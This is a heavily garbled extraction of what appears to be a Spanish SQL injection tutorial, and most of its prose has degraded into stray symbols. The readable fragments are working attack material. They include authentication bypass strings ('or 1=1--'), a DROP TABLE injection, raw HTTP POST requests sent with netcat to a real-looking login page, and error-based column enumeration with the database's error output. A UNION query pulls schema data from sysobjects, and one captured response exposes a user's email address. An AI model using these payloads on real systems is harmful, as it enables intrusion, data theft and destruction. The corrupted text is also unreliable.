!

!
#$%&

"
'
" * +"

(
,# .
/
"0#$%
'
"
, *
) 1 % )" + !
"
, *
, ")
- **
2 #$% '
"- " "
3 #$% 4
)

?
@
B
C

) 5
,
! )
%"
"
5 "
67"
* 8*
"
. 5 9 ", #
:)
*
*
#.
8<
+
"
" )
>; ) 5
4 '
" ;
4 #
!
4 ! ', *
#$% 4
: "'
"
' "
"A
"
*
"+%
"'
; "
A " "' ) "
5.
"

""

) " " "
! 6 . "
#$% 4
+ ;7

"

.

/
;
" =

"
"
" .>
", "
"
" 8<
" "

#

,

"

!

,

"

"

"

"
"

#

8

"

)4
" 7

# )

"

"

+ =
)
& " +

. "
!
.
7

6

&
"
"+

"

9
&
"

" "
. "
( "

&

D
"

9 &

"

"

(

*
6

+

*

"

6
.
"
" 6 ( ""
" 4 ""
"
7<
"
) "

"

" "

"

&"
"
"& "=
. (( #

+

2
;

" "
"

*
5
"

.
"

6 " .

"

"

" 6
"

)

&

"
(

"

")

)

* 9

"

7 " 6 (&
. 4 #$%&
" "
" "

" *

"

9

"

"

$

!% & '
5 *
"
D
C 2
.
6 " .
'
"
* 9
"
" 9 ( " ) 4
&
"
* )
4 "
"
%
#8$ 8%
*
*
&
!

% .
. =
4 " " "
"
+&

"& +

"

D "

"

"
&
.

"

)
" "

*

(
&
"

"

"
)4
"

) 4 )
6
9
"

( )
"

+
8 . "
6 7 "
6 " . "&

*

9

"
&

"

>#

"
"
) "
"
9
. 4 #$% " 6
E#+) " & :
+
"
51#
CB@ +
"

9
"

.& 9
+" " ")

"

*

"

)

"
. 4
"& 9

"
") " "
.

"

4
"
. 4
+ % . . >
*
6
D
C &
#8$ 8%
#$% E#
$ + % . . F

$

" D "
,-

&

9
9

+ =
*

<F
#: * "
" 6"
.=
.
"
. 4
4
"
6 "
. 4 "
"
"

*
CB
" #$%BC + #$%C &
"
6
"

"
"
6

.
"
"

"

"
"

+

(

"
&

"
"
)
6 "

"

>!
#$%>
"
9
4 "
) )
"
6
"
" . "
4 " "=
9
"
#$%2
.
6
"& 9
"
+
6 6 "
6
. 4

(
) * # +,
$ ( " " "
"
" ) "
"
" 9
- +
" *&
) 4 ) 4
"
"
9 " =
" "
=
,:# !
9
"&
9
" *
"
& " )
) 4
9 "
6 "
2
G
" E,
.
*
&
" 6 "
"
"
"
""
F&
" *
) "
D= " " )
" ) :# & " "
" )
"
)
"
.
" 6
"
!'
"
"
%51

3
5

) &
( ) "

"C &
9 "
& )
9
. )
"
6"
9
4
& "
9
" )
*
" . =
"
6 6 "
# &
)
" 6 "
2F
" 9
" *
9
"
)
:# 2
%

"
)
7

" 9
" ") "

) "
"
9

"

8
""

:#
"
6 &

6
'

"
9

&

- "
*

"
"

*

"

, "
"
6 "6 "
"
#$% @

&
"
"

.
"

"

"
"

"
.
"

" "&
"
"&

"-

.#

'
*

"

/

" .

) =
.

!

0

9
6 "& +

9 6
"

"
"

" .
)

*

=

9

"

6

6

"

#+) "
:#

+

G

+
9

"
" 1;& +
" *
0 "
"

" * #$%& " *
9 ( " .
CC?
"
"9
.
)
"

#0#$%& ) 4
&
"
"

F&

"

"

"
6 "
#$%
.

&

"
" *

,

)
-

6 "
)
" 1;> H "
D CC2

"
&"
"
G

&

#+) "

5

)=

" "

"

.

E#$%

6 "

"

9

.
"
"

)

) "

" 1;

67"

"

CCB
.
)
9
9 " )
" - "
9 "
. "
" .
" "

9

D CC
=
" * #$% # 6 3 *
( "
"

) >
( =

& +
9
=

( )
.
"9

"

.
6
, "
G

&

"

" *

=

"

"

,

"

:#

" )

7"
"
"
&"
*
*
"9
" *&
2
G
" 1;

" .
"
9
"
"
E!
9
) 4 =

"

" * #$% " 6 "
&
"
I)
&
"
" )
.
( #$% # 6
&
"6
)
"
"
&
"
" "
"
6 4 ""
&
9
"
"
"
"
4
6
" "
=" "

*
9
9
#$% # 6

& "
" "
"

"
""
<

" *&
*
"
"& "
" "
"
.

+
) "

"

" " " #0#$%& " " "& 9 8 " >#5> + " 8 ) < " #$% 9 " #0#$% 9 " 9 " 4 " " 5 E8" # 6 & 5 ) " 6 + ) " .'! 332 . )9 #0#$% . " * . " " " " " 9 " & " 6 . & "9 " " & "9 & " ) " ) 4 " E' " " " " #0#$% # 6 & 9 " ) " ) 4 . )4 " F %# " & " 6 & . " . ) " " " I + ) 4 & " & * " 6 #0#$% # 6 & "" 6 " " 1 % )" F + = " * " " " * "& ) = " 4 " " ) 4 " " " " " )7 & " E#51& 5 . " " ) " ) "9 " 9 . " " " 9 " #0#$% . " " " 6 #0#$% " #5 " " " < " " 5 ") " " " ) . M& !N #!N& . " " .'! ! + 1 ! " & " " + F * 4 4 9 " " " " " "& .? # ) 4 )6 ") & * " " ) = + " " #$% ) " & " " ) " " . 9 . " > > EKKF " " " " 6 7 "& + " 6 "" "* ( 1 ( * $# #0#$% 6 L"& . & " + " J 6" 8 6 " " " ) & " " . = < < 6 " " "" & " 9 ( ) " ) +* " " " " " . "& " 4 " "6 " ". " = & 9 (. " "6 4 " EIF " ) " " "&" 6 .'!& ( 9 " 9 " " & " " " .

! * " " .:.:# . . 8< " " 9 Q Q" Q " Q " " 6 " < < < < + " 6) -""" " Q " " Q " + + + "" " >& " G ( " . 6 % * #$% # 6 > O#$% # 6 "* " . " " " " " " " " ) " . " " +" " ") 9 5 " " " " " ) ! " Q " Q " Q .** " " " > 8" 9 " " * 6 P & . ") 1: < " " + " " " "& " " + " > M .@ 8 * 6 " 6 #$% E! 4 7 & " 6 "& "6 ) ) " " = #5 " 9 + "" > >F " "9 6 #$% )7 "& . 6= " & " ") ") " < = > E #-1 B303B 022CB0@F ) < < < < < < ) " 6 "& " " " " " # ) * " " 9 * " #$% # 6 9 ) ". " * " " 1 + ( & . * >. " " " D " " . 9 " < " " " " & " " ) ** #$%& > M .! " ) < " "6 " " . 8< " G ) ** " ) " >" 6Q * EF> "" Q M9 Q " Q < Q" "9 " Q"9 .#)) .

" "6 " " .# .# .8 %! # #! % " " " " * ) 1#8 ."2 % & . " 0#$% "& < " . 6 " . :! % & .# . 5 " E!%0#$% " *F " ( + " " " " ( 8 5%. * " " * #! . " ( ( ( % & ' 85. ." ( " & ) " " J * " * " " "9 ) " " " "+ " ) ) " " " * ( " * " %! # #! ( A : G 8 8 ( ( / : ! -S 5H 1/ : . " " " 6 " " ) & #$% " * " <" " " : & ." "9 " . " & " " " . + ) " " * ! ( ." "" " " =* " 9 ) " "* . . ( . " < " ) " .81S +% + ++ + "& " " " ( " " " " " 6 . " .8 . 8H:R8 . . . & 6 " ) "& " = ) " = " " ) " .8%8.5. ." " 6 " " "9 ) " 6 " " .8 #8%8'.8 -S " & . " % & / 51." "" " " * "9 ." " " "* . 4 ( ( " * " " * " .8 "" % + ( !. " .

E8" " 6 6 " " " . " >5 9 " 9 * 6 & " "9 " #$% ) "& " . .G881 % R8 1 + . " ' * " . " 9 ") "5 # # 67 " H ) ") " 9 = " & . 8 & >& " " " 9 "& " ." . ) >F UPADTE Tabla SET password = 'Juajuajua' WHERE user = 'admin' E8" " ( = "" " & 6 F 5 4 " ) & " " " "& " " " 9 . * " ) & " & 7 9 " + 4 " * * "* & " " 6 " 9 + ." " ) >. ( . 4 #$%& " 4 " " ! 4 4 " # ) " & " 6 " & 9 6 " " #$% " " = & " " " " " "" " 4 " " " + #$% & .B 3 % & T U TU TV UV V -8." " ) " " 4 & ! SELECT * FROM Tabla. * " 9 9 9 9 6 6 " ( ( " * . 9 + ( .

# 0 :) * 0 8< + 0' " . & " ) . * " * " " "6 " " " ") " " " " 6 " 9 . " " 0 8* " 05 9 ". " * " " " ! . )4 6 " 4 > " "9 & ) " " .= " " " " " ) " "G " " " 5#! =" " 9 &* " < " " " 6 " < " * "& " ". * " " =* * # 6 " ) " " " #0 G " 9 * " " ( " 7< " " " . " " " 8 " " = " * . . 4 . 9 * + 9 . " )4 6 " &+ " " " ) 4 * * ( 6! # ) ) " 6 & " " 9 8" " 4 #$%& 5 + 4 >#$% #0#$%& " * " " "". J # 9 " " ! " "& & " 6" < ) 9 " 5 * " " 6 + 6 9 ) 7< ". J " " & 9 < ( * 4 " 8" " " " " 9 + &) 4 " 7 " . " "* " ) " " "9 6 " + "" ) " " " " 6 " ) " 4! $ (! & 9 " " 6 . 4 " " . & " " " & " # ! 6 .C " 6 " " ) " " = # ) & )4 < 6 " " ) " .J . " #$% 6 " " " 7 . * " 6 "9 9 . " &.

& " & . ) " <FORM action=logon/logon.J 6 " " " * 9 " " " " & " "& " ) " )9 " " )& " 6 "& + " ) . . 5#! ) " " E! * . %& 9 ) " "& . . < " . ) + = 6 6 " ) ) 4 " ( " 6" ) " " . 9 + " J . &) " " 6 " " 5#! " " F 8 + 6 " " " & ( " . " " ) ) M. " " " " . " "II ) & " 4 ( " & " "= + " " " . " " . . " " . % + 6 6 & * & ) " . " " " * .asp method=post> <input type=hidden username=_UserName password=_Password> </FORM> 8" * .8 9 + 6 "9 ( " 8" 9 " = " " & "9 " " ) " 9 " ) 6" " " ) " & " " * " D + :M& " " " " " "+ 8 " " " " ) &" " 6 " "& ) " ) 6 ( & " = " "" " = " " 6 )& " ) " " 6 " " " 9 " " : % * " ) " & + = ) " " " . &" . " " * 6 + . "= < * ) ) select * from users where username = _UserName and password = _Password 5 * " ) 9 " " " 6 " 6 6 " " " " . " * " * * 6 " " " 6 "" " " " " "& )7 .

5#! 9 8 " " & + ) ) . . "* " " " % 9 " = + ) " " " " . 9 * 6 " 6 . H " " = .+ ) ) " " < " % " ) " * " " http://www.= EN. " ) 7 " " + " + " 9 + 9 ) " #$% 5 6 " & E' " " " F # ) " " " ! " % L E' # " 4 &" + 9 " ) * + F " "& " " "" " " ) 4 " " ) L " ") + " * #$% # 6 " " * * 6 9 9 " 9 6 "" " ) #$% 9 * " ( "9 4 ( " 4 & ( " .asp?edicion='Noviembre' ! " " & " " " " ) + ) " " L1 6 ) L " " " " ) 4 . " .com/libreria.F )7 " " 6 . ) " " " . " select * from numeros_anteriores where edicion = 'Noviembre' " #$% > " & " 6 9 = >& .objetivo. & " " " "* " " " " * . & " ) " " " + " " 9 . " " " " + & " " " " ) " Usuario : An'gel Password : 338xD select * from users where username = 'An'gel' and password = '338xD' .

select * from numeros_anteriores where edicion = 'N'oviembre' 8 ) " " . " 8" " " ) " 8 " * " + A * 6 " ") " " " " " 6 & 6 6 9 " .J . 9 " 7 " " # 6 " . & ". #$% ( ( 6 ) " E84 " )4 . " . 6 " 67" " 4 " " + & " . " " " . * " " L5 L + L1L II 9 . " " " & 7< ) " & < " 4 9 )7 & " " " " 6 " " " ? >8 # 6 >F "6 " 9 + #$% " 6 ) " " 9 "& 9 ) " " ) 4 + " ( " ' " ' & " ) 4 > . ". ) = & 9 " " )7 " ".J 6 " * %& " " " & ( * " ) "& . #$% > EH B * " + " "F 9 " " * . "& " " 5 " ) 9 " "" 8 " 9 " #$%& * " " = " & . " < . & " 6 "& " * " 9 6 " " & ) ) " " )" " " " " " . . 9 " "" & " ( "" " 9 " " " " + username = 'An' edicion = 'N' % . & " 6 9 " " " + ) 4 " " " . " . "9 . " 4 " 9 9 " #$% # 6 ( & & ". "6" ) " "+ " " * " " ( 9 + * 9 6 " " . " . " " 9 " #$% # 6 & " 9 .

" " + = " . 9 & 4 & ) "= 8 " * " & ) " " ) . F * + = ) . " " " < #$% "& . . )4 6 6 6 " " !8 ( . & 6 " # ) & 1: ) ) " " & "6 " " ) E8" " " ) 6 "+ .2 1 $ % & ' +! 0 (#)* .J ) " E! " . & 6 " "* " ) & " > 6 * "6 & " " . >. . - 123 % & ) " & 6 9 * & ) + " ( " * " I "" " ) " " + = " & "9 "" "" . >F " > ) 7 "6 # " "& " "& + "9 .:. -. . %& 5#!& & " " " 6 ( 9 # 6 ' " 9 " ) "& 6 ) & " & 4 & . " 9 " " "& 9 ." > >% " ' "> " ) " " " " 9 " " " ) 9 . " 7 9 . / % . " = & " . " 7 " #$% 4 . . " * . " " " "& ) " " " " " " " " " " 9 7 = " " "6 " ) " " * " * " ) 6 & "= " " " "& . . " = ) " 9 " .5 * " " 6 ( ! " ( &" . " . " " " " .J " " + ) 4 * " EH > % " ' ">F " > " 9 & " 6 " " 9 )7 "> " ) ) " " 6 " 6= "> " * * " "& +J " & .

" " " 4 " " 6 + = ) * ) & 3( " & # " : 0% & " " "+ " .= & ! . " 4 " " " " " "" " " ) "& 9 " "& " . " " + * "& " " ) 6 " " " " * " . " " " D " 9 6" + ) " < " "+* " " " " & 9 4 4 4 ) " . " # 5 : + !5##G: . "& " " . 9 .J " " " "6" + " 9 * " . ) 7 = " 9 * " " 6 #$% " <"" . 5#! 9 ) " + 6 #$% . #$% "" " . Helvetica.= "" $ ! .Extracto ------------------------------------------<FORM action=ingreso.asp method=post> <TABLE cellSpacing=1 cellPadding=3 width=440 bgColor=#ffffff border=0> <TBODY> <TR bgColor=#ff0066> <TD><B><FONT face="Arial. *= ---. " " " " " . < = " ) . *= " " = " " "& : 0% . " " . % 5#!& * " " " " 9 6 "9 " " " 6 "& . " " 6" * . ! 6 " " . 5 " " " " & ) ) * "& ) . sans-serif" . I) & E> L >F * " ) 6 " + " = (! " .3 $ (! 6) " " " " " " / ! "+ " " " * " 6" " H 7 " " ! " * = " . 86 . * " " " ) & " 4 8" " * .

sans-serif" size=2>Clave</FONT></B></TD></TR> <TR bgColor=#ffcccc> <TD><INPUT name=USERNAME> </TD> <TD><INPUT type=password value="" name=PASSWORD> </TD></TR> <TR align=middle bgColor=#ff0066> <TD colSpan=2><INPUT type=submit value=INGRESAR! name=SUBMIT> </TD></TR></TBODY></TABLE><BR><BR></FORM></TD> <TD vAlign=top align=left width=10> </TD> <TD vAlign=top align=left width=140> <TABLE cellSpacing=0 cellPadding=0 width=140 border=0> <TBODY> ---. ) select * from users where username = ' or 1=1-. ( " = " & ) 4 & " F .and password = ' or 1=1-- + . " " & " " " " " " 9 * + 9 " #$% " 6 "6" "& + " " "& " ) " select * from users where username = 'Angel' and password = '338xD' ! " " 9 ) " ( " "9 " + ( "" . Helvetica.? size=2>Nombre</FONT></B></TD> <TD><B><FONT face="Arial. 4 * 5#! E! "9 5 ) &" 9 6 " " " " ) . " ( .Extracto ------------------------------------------! " 9 . " " I :M& " + 'or 1=1— " 6 " . % . " Usuario : 'or 1=1-! "" L V W A 47 " "& . " ) * <" 6 9 = 6 ) ) " 9 * " + " ) * 4 = " " #$% " " " D . 9 = " .

@ 1 9 " "" . " " & F& . " >5 > 9 > <" > " = Usuario : Admin'-Password : 'or 1=1-8 = & " 9 " " = " " " . " 6" " " "& " " " * " / " .J " & " ) " 6 " & 6 4 . "" + " 6 . " & "6" " 9 4 ) 6 F " " + & ) ) + " " ">L> " + > 00 > E. 8 E' 6 " * "= + " . ) / F " < "& " ) " " . " & " " & " 6 + > 00 > E. " " 6 & . 9 . 9 " 1 ( " 6 6 + = <" " " " " " 6 " "6 E "" " " >: > 9 " " ) . F " " " 9 6 . ) & #$% 9 . + & ( #. 0 4 Usuario : 'OR''=' Password : 'OR''=' 5 4/ ' ) " > " # ) " & " ">& " #$% "& . + " < " ( 7 " . select * from users where username = 'Admin'-.and password = ' or 1=1-# . " 4 )4 .

& . * 1 " * " ) " 6 " )4 ) " " )4 " " 8 ". "" " 6 " & . " ' . * 6" " " + % # #$% # 6 & + " & " 6 . " "& 9 6 " J " " * " ) 4 " " 9 6 " * " 6 ." " > " " . " " " " E' + < " F& " " " " " " " . " " " ) " 9 > 9 " + *. ".J " " "& " " " ) "+ . . " " " # ' * + = $ 7! . "> " ) 4) 5 " #$% 6 .9 + & 6 = " " ) ) "& " " . & ) 4 ! " 6 " 6 " " * "& + " * ) " " 8 4 . " ) " 9 D " ( ) * " ) ) " " * " < " " ) 9 " . & " " " . & " * " $ 7! . 9 " " ) " " "& + " 9 " " & 4 & " 6 " " " " " 6 " " " & " 6 " 4 & " + * " " ) " < 6 . " + " ) " " . "" 6 ##$%#8 H8 < >< Q ) " )Q "& "* . "" 5 6 ! " 9 " > " 9 " < + " " . " ) # " " " 17 ! " ". " " 6 & " > " & " ) +> > " " ) " " #$% # 6 " " " " "& " "9 " .

" 9 & & " " "E ) "6 & + " . .-' :%8 . 6 9# + & % " 9 " . " 9 * " " 9 " 6 " " 5"= + 6 " ( & . ) = " & + 1 $ % + 67 ) : 3( ! ) ) 7 " ) & #$% ( 4 " D # ) " " " " .B . " ) " " ) " . " "6" " . 6 9 J " " " ) & " " = 4 & F & * " 9 * & & Usuario : '.J 4 " & . " " 6 * " & " = 8 " . # " " ) "& " " " " & " 6 & " "9 ) . " " 6 .4 " #$% # 6 . # 6 & " 6" " " " " E8 " " ) " = "& 4 " ( + ( & F 5 9 * 6 9 " " " 6 " &6 9 4 " " ) " "9 . " "9 "& " ) . & + M #$%& " " &" " " D " " E' = " 5 9 " 9 " .J & 9 7 " > " &" " " "> " ! 6 & " * + ) ( . % & 4/ . 7< " " & ( = & 9 " " * F . drop table usuarios-Password : # * EH " ) ) ) & ' 6 " * >8* . " >F & " . $ ! #& " * " " " " ( & " " ") " 9 ) " :.

C "9 1 " " "6 ) " 8 & " " "9 ) " ! " " " " D 6 6") " .<< 9 + .-' 8 " )Q .8#* ."3. 1 "9 * " < " * #$% < ) " " " > )Q ) >F " * )Q ) & ) ) " " ( " " " "> . > * ) 3 % ) 010.9$ (")-#) 123 :. " &" " &+ " 4 " " " + " 6 (" "& +* " * . - & 6 :)6 % " E 2 ! 3 8 ? .1) 8 6 + "9 * " " " 6 ( ".login='\'') ODBC Error: 1 (General Error (The ODBC interface cannot return detailed error messages). > & " " :. Warning: SQL error: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '\')'.. SQL state 37000 in SQLExecDirect in php/db_odbc. " " 9 6" " "> " .inc on line 61 Database error: Invalid SQL: Select * from usuario where (usuario.) Session halted.-' " " 9 " 6 + :. > L > E' * " " 4 # 9 " 6 " " < " " " & " " F " & 6 " " ) " " .

0. 6 " " " " " " " = #$%& 6 " " 6 " ) " " " ! 9 + #$% ) " ) 9 " " 4 ) " ) " " . = 0.v 1. 9 & " "& 9 * 9 9 6 " " + 6 & " " . " 6 4 * .Fragmento ----------------------------------------6 " " . $Link_ID $Query_ID $Record $Row var $Errno var $Error = = = = 0.Fragmento ----------------------------------------<?php /* * Session Management for PHP3 * * Copyright (c) 1998-2000 XXXXXXXXXXXXXXX (XXXXXX@XXXXX.----. 0. " " .XXX) * * $Id: db_odbc.XXX) * Modified by XXXXXXXXXXXXXXXXXXXX (XXXXXX@XXXXX.inc. $Database = "". $User = "".3 2000/07/12 18:22:34 kk Exp $ */ class var var var var var var var var var DB_Sql { $Host = "". $Password = "". & " 9 4 . ----. = "". &" * * A * " )Q ) " " " >" " > " 6 ) " X " + X! "" " 9 " ( " " " . " * " + 6 + . " " < 9 " " ) E8 " " F : ) & * / :M& 6 " " * 6 " "& * + " " " + . $UseODBCCursor = 0. " "6 & . array().

asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip.asp?validar=2 HTTP/1. " . image/pjpeg. MSIE 6..8 " " " ( 6 " 7 " #$% " 4 " & " ( & " " ! " 9 6 4 6 " " ) " ) " " # "6 " "& " " & J * " " ) < 9 " " " ( 6 +) " " " 9 " " B " * " . deflate User-Agent: Mozilla/4.! * E8 " " * # +1 & " .com/Login.objetivo. " >! "" > .0.1 Accept: image/gif. . * "' "+% ) 4 F 9 7 " < "" " " " " 6 % E8 "' ". " 9 " . " " E5 .xxxxxxxxxx.com Content-Length: 34 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA.! " )4 6 & " 6 " < & & ".0 (compatible. Windows NT 5. = 6 " "& " 6 & " * " ( " 6 nc -vv www. " ) )4 6 . image/jpeg..0) Host: www. " D " * " " .com 80 < sentencias. */* Referer: http://www..txt ' ' " & ( 8 9 ) " " 8" * + + " * " ** * F& .! M "F& E5 . image/x-xbitmap. 7 " 9 D " < & " " 9 " 6 " " " . ) " " " F& " 6 " " POST /Login. application/x-shockwave-flash. xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Angel&txtPassword=Angel Y Y Y H .xxxxxxxxxx.

" . " . " ** ) " 9 ) * " 4 !:#. " Y H + L 6 .asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip. MSIE 6.0.asp?validar=2 HTTP/1.-F ) " " " 6 " " " " > " )4 H 6 ( " " > " . .1 Accept: image/gif. 9 > " " " < " 6 6 " )" 6 6 ( " )+& ) " #$% 9 F " ' " " " * " 9 < & " 4 "& " 4 " * 6 " " " " 6= " " " * ( 6 POST /Login.Y Y H * - & " ! " " " * ( * 8 " . V 00 E8 Z 6 .[ Z2. xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27having+1%3D1--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y .0 (compatible. Windows NT 5.com Content-Length: 46 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA.0) Host: www.xxxxxxxxxx. 00F " . deflate User-Agent: Mozilla/4. image/jpeg.xxxxxxxxxx. ) <& 4 " " .application/x-shockwave-flash.& . */* Referer: http://www. image/pjpeg. + ) " ) > L > E' 9 " ( 6 " " F & * " 6 " ) " " " E 6 . " 9 "" < 6 " " " + & 6 6 " ) " ! " " " * 9 " 7 ) 4 !:#. image/x-xbitmap. 6 "" ( > " > "> #$%& " * 6 9 #$% E 4 :%8 .com/Login.

com 80 < Injection. Z ' Z B Z C Z28 Z2' " .& " + ' # ! +' .M# " " 9 " " 8 * " " " 4 = " !:#.objetivo.2 1 .html - 6 "9 ) ! " " " * " H " 9 6" " " 9 9 4 " * & " "" " . "! " 8" #. . " " * " 4 " > 6 .! " Z Z2Z25 [ Z Z2. " " "> > " " " " 6 ! \ ] 5 ! [ 0 ^ Q 9 6= " 6 " " ( " & +6 ( 9 " 9 " ) " Z 0 Z?' Q 4 <& " " 9 " " ! 6" 9 " .. $ 3 " = )*1( 5*'> ! " " ) " ) " " % ) 9 6 6" "".txt > result.>& " & " " 7 ) . ' ! 7 "" ! 7 "" + OO V & E F U T :MK 6 "" " " " ( 6 6= " &+ 6 " " " ) "9 " nc -vv www. " " + " " + " 9 .

com Content-Length: 71 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA. 4 " " )" 6 9 #$% # 6 " 6 6 * " " . /Login. image/x-xbitmap.asp. deflate User-Agent: Mozilla/4.1 Accept: image/gif.0) Host: www. line 85 ! * KK " " " 4 " ) ) " E # 5 :#F& "= " 5 " " H 9 6 6 " "& " 6 " )7 " 9 & & " = :. application/x-shockwave-flash.xxxxxxxxxx.-' ( ) * ) & " * < + ( " " " " " 6 !:#.UID' is invalid in the select . V 00 % . " 4 6 " = &6 " ". image/jpeg.F * " " ) .com/Login.UserID+having+1%3D1-&txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . )+ " " " . 6 .asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip.asp?validar=2 HTTP/1.0.xxxxxxxxxx.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. " E " .0 (compatible. " H + L.xxxxxxxxxxx =COUNTRYNAME=Argentina txtUsuario=%27group+by+usuarios. Windows NT 5. image/pjpeg. */* Referer: http://www. MSIE 6. Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.3 Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS. = & * " # 5 :# ) POST /Login.

? list because it is not contained in an aggregate function and there is no GROUP BY clause. " ) * " " ( "+ " * 'group by usuarios.Nombre' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause.UID.= & " " " 9 " ) " >. " )+> " " # 5 :# " "& " + 8" " = " > 6 . /Login. ) " " > .UID having 1=1-#! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS. " > > 6 > " & " 9 " # 5 :#& .asp. line 85 . line 85 6 ( " " 6 ( + " " #.usuarios.UserID. /Login. .asp.UserID.usuarios.usuarios.asp.Nombre having 1=1— #! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.> " ) . /Login.Email' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. line 85 * 'group by usuarios.

:# " " #8%8'.& " " 9 " " " " .@ * 'group by usuarios. * " )+ & " " & .0 Date: Fri.campo2.& " & " " " " + " " " " ( ' " ..Nombre. > " "8 > 8 9 " 9 & ) " .1 100 Continue Server: Microsoft-IIS/4. 14 Feb 2003 20:02:22 GMT HTTP/1.Email having 1=1-#! ! * HTTP/1.! 1: " &" 9 " " " 6 . 16-Mar-2003 05:00:00 GMT. " + 9 * " II 6 " 4 < " # " " . .UID. :M " 9 =& " )" 6 " + ) ".:. E/ "1 F A=4 " 9 " " !:#. " 9 .usuarios. . usuarios. . * ) " .path=/ Cache-control: private Object Moved This object may be found here. ) 9 9 " " 9 " * . V 00F .campo3 FROM nom_tbl WHERE campo1=x AND campo5=y . expires=Sun. " " " " ) " "& 4 6 9 #$% 6 + E8" " L. " " "1 ) & " * "8 " ) & " " "" .14 Feb 2003 20:02:23 GMT Connection: close Location: PaginaPersonal.asp Content-Length: 139 Content-Type: text/html Set-Cookie: xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&US ERFIRSTNAME=roxana&COUNTRYNAME=Argentina. " > > " ( " #8%8'.1 302 Object moved Server: Microsoft-IIS/4. & " "& " " #8%8'.0 Date: Fri.usuarios. 6 .UserID. SELECT campo1.

0) Host: www.name+in+%28select+top+01+b. * " >#8%8'.> * 9 " ) " 6 ( " .1 Accept: image/gif.xxxxxxxxxx.xxxxxxxxxx. " " ) " > >. image/pjpeg. " 1 :1 " . )+> + > 6 .0. & " " + % .na me%3D%27usuarios%27+order+by+1+desc%29+order+by+1-&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * . */* Referer: http://www. " Y Y H + "L " ) & & & * "+" )4 " & "+" " ) V) VL " "L ) E" ) * "+" )4 " & "+" ") V) VL " "L )+ " F )+ 00 > "> 9 " " ) " " " III H "& ( " + = 9 " " # * " ( " . application/x-shockwave-flash.# + #S#':% 1# " > .com/Login.id%3Db.asp?validar=2 HTTP/1. Windows NT 5.name%3 D%27usuarios%27+and+b.name+fro m+sysobjects+a%2C+syscolumns+b+where+a.0 (compatible.( ) = " ) = .:! E8 " " F % " " " ( 1 6 9 " " 6 " #8%8'.>F " > + > 2>& " 9 " ="&" * ) " " " " " POST /Login. * "+ ) 7 " " " E8" " >& > <" > ?> E.com Content-Length: 297 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip. image/x-xbitmap.id+and+a.id+and+a. + 9 " " " & " " " " ) " "" #S#:-b8'. deflate User-Agent: Mozilla/4. 7 " "& "= * 9 ) 6 " " . xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27+union+select+b. MSIE 6.id%3Db.name%2C1%2C1%2C1+from+sy sobjects+a%2C+syscolumns+b+where+a. _ A : ` a> " " " " 7 F " ( . image/jpeg.

1.-' " " 9 ) # 5 :# " > " # )!% #. " D * " " * " # " + " 6 ( 9 " " ) " ) + " " 9 " #$% > 1 :1>& " 6 . > % . 4 #$%& " 9 " J " * "& " ) J 6 " ) " " ! 4 & " 1 :1& " " " > " " " " " ) " " ! " EF& " ) " 7 9 " * " " J >& " ) . line 85 :M& 6 " :.id and a.:. syscolumns b where a. " " " & Ups' union select b. .colorder = 48 -7 " " " E! >F " > ! 6 " & 4 4 9 " " " " 4 " " " +J ") " 7 " . % " 9 = " " 9 .1 from sysobjects a.:# 6 !:#.:! F .id=b. )4 ) ) " " " 6 " " " . 6 ". ) ! #& & 6 "& " ) " & " " &+ " & ) " " & ># 9 )7 " " " % . ) "+ " :- . ( " 4 Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UserSubPLUSDate' to a column of data type int.:!& " " .name='usuarios' and b. " " EF> " # ) " 1 :1 " " " " >) " "> . /Login.name.B 4 . .asp.:! + " .1.# 5 ".

) " & "& " ".xxxxxxxxxx.0.0 (compatible.com Content-Length: 82 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA. !:#.0) Host: www. . */* Referer: http://www. ) ) " " .1 Accept: image/gif.-' " " ) 9 ( " 6 " " " " " " ) & "= & + ) . deflate User-Agent: Mozilla/4. " Y H + L " " E . xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+union+select+sum(UID)%2C1%2C1%2C1+from+usu arios--&txtPassword=Angel Y Y Y H 9 6 " >! "" > Y * .> 9 " " 6 E> " ( " " & " " " 6 9 6 " 4 4 " " " F 1:& " 9 = 6 :. " < 6 ". 4 " " 6 " = 6 & ) )4 1 " " Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a nvarchar data type as an 